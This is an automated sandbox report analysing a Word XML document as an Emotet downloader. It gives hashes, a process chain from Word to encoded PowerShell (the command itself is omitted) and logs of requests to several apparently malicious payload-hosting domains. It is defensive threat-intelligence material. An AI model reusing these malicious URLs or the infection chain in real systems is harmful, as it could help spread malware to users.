File name: 847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa

Full analysis: https://app.any.run/tasks/78437338-4b6f-4c65-8159-c9fcfba8fc9a
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: February 18, 2019, 13:07:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: emotet-doc, emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: D04999E6770DBD70D697171774D9FCA2
SHA1: BD20AB57085B3216A9B1971C1587B3994EEC539C
SHA256: 847E718FA1DCA436C5F8E20E88BBC016BB163B7EAEEDD68824FF85FAB88F2EFA
SSDEEP: 3072:2gM6pmKZlGHuE6cJW5ZCQY6f8wFMP62h8hqjL/xSu90OoiLuDKZXfwKeljR1l:k6IKbx24ZC7MFSEh4xUOmD+XfwLB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
MALICIOUS
  • Executes PowerShell scripts: WINWORD.EXE (PID: 2608)
  • Request from PowerShell which ran from Office: Powershell.exe (PID: 3936)
  • Unusual execution from Microsoft Office: WINWORD.EXE (PID: 2608)
SUSPICIOUS
  • Starts Microsoft Office Application: MSOXMLED.EXE (PID: 2948)
  • Creates files in the user directory: Powershell.exe (PID: 3936)
INFO
  • Reads Microsoft Office registry keys: WINWORD.EXE (PID: 2608)
  • Creates files in the user directory: WINWORD.EXE (PID: 2608)
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRT:
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://tuzWAo6FkAUf6
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://tuzWAo6FkAUf6
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 004F5309
WordDocumentBodySectPRsidRDefault: 00853DEC
WordDocumentBodySectPRsidR: 00853DEC
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 107904 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: KPRjpMJ
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 4
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 4
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:02:08 09:27:00Z
WordDocumentDocumentPropertiesCreated: 2019:02:08 09:27:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
Total processes: 34
Monitored processes: 3
Malicious processes: 2
Suspicious processes: 0

Behavior graph

start -> msoxmled.exe (no specs) -> winword.exe (no specs) -> powershell.exe

Process information

PID 2948 (parent process: explorer.exe)
  CMD: "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xml"
  Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: XML Editor | Exit code: 0 | Version: 14.0.4750.1000

PID 2608 (parent process: MSOXMLED.EXE)
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xml"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Word | Version: 14.0.6024.1000

PID 3936 (parent process: WINWORD.EXE)
  CMD: Powershell -e [encoded command omitted]
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows PowerShell | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 811
Read events: 1 337
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 3

Dropped files

PID | Process | Filename | Type
2608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B1E.tmp.cvr | -
  MD5: - | SHA256: -
2608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB9C032A.tmp | -
  MD5: - | SHA256: -
3936 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DRCW0PQTSGGT2QDJ0ZDL.temp | -
  MD5: - | SHA256: -
3936 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24758e.TMP | binary
  MD5: 6073B6FC66D2E68644893344F6904E4A | SHA256: 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3936 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary
  MD5: 6073B6FC66D2E68644893344F6904E4A | SHA256: 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$7e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xml | pgc
  MD5: FF8892CFB2AACA347BF424713DCA72B3 | SHA256: D233113F9800CC81A562E02E2F7E71A04AB536EC77FCEE1A5E6926698B7318CB
2608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb
  MD5: 1F3834663FBABC6E0DDE076EC9795AB2 | SHA256: E9AC831CBF711513DA3313B5541D7805CB5EA96B88D19D6C3F5BB2A31FE49035
2608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
  MD5: C6A56A9D54BDC2AEDB4ED18E3587ADA2 | SHA256: 9DB6C2919BC60A8D104A3ED9594A03768496DF6E7042B2EFDFF48CAEBE08AD19
HTTP(S) requests: 6
TCP/UDP connections: 6
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3936 | Powershell.exe | GET | 404 | 37.148.211.11:80 | http://tvbildirim.com/Kz85NH65 | TR | html | 15.3 Kb | suspicious
3936 | Powershell.exe | GET | 301 | 209.240.96.46:80 | http://elracosecret.com/dBKOV6xm | US | - | - | suspicious
3936 | Powershell.exe | GET | 404 | 103.232.121.71:80 | http://thoitrangstaup.com/kCXbqtJXG | VN | html | 61.1 Kb | unknown
3936 | Powershell.exe | GET | 301 | 69.10.135.25:80 | http://seguriexpoforo.org/HXJhr85PO | CA | html | 379 b | suspicious
3936 | Powershell.exe | GET | 200 | 69.10.135.25:80 | http://seguriexpoforo.org/HXJhr85PO/ | CA | html | 379 b | suspicious
3936 | Powershell.exe | GET | 404 | 209.240.96.46:80 | http://www.elracosecret.com/dBKOV6xm | US | html | 14.4 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3936 | Powershell.exe | 69.10.135.25:80 | seguriexpoforo.org | TeraGo Networks Inc. | CA | suspicious
3936 | Powershell.exe | 37.148.211.11:80 | tvbildirim.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | suspicious
3936 | Powershell.exe | 209.240.96.46:80 | elracosecret.com | Turnkey Internet Inc. | US | malicious
3936 | Powershell.exe | 47.88.29.116:443 | www.oilrefineryline.com | Alibaba (China) Technology Co., Ltd. | JP | unknown
3936 | Powershell.exe | 103.232.121.71:80 | thoitrangstaup.com | Viet Solutions Services Trading Company Limited | VN | unknown

DNS requests

Domain | IP | Reputation
tvbildirim.com | 37.148.211.11 | suspicious
elracosecret.com | 209.240.96.46 | suspicious
www.elracosecret.com | 209.240.96.46 | unknown
seguriexpoforo.org | 69.10.135.25 | suspicious
thoitrangstaup.com | 103.232.121.71 | unknown
www.oilrefineryline.com | 47.88.29.116 | unknown

Threats

No threats detected
No debug info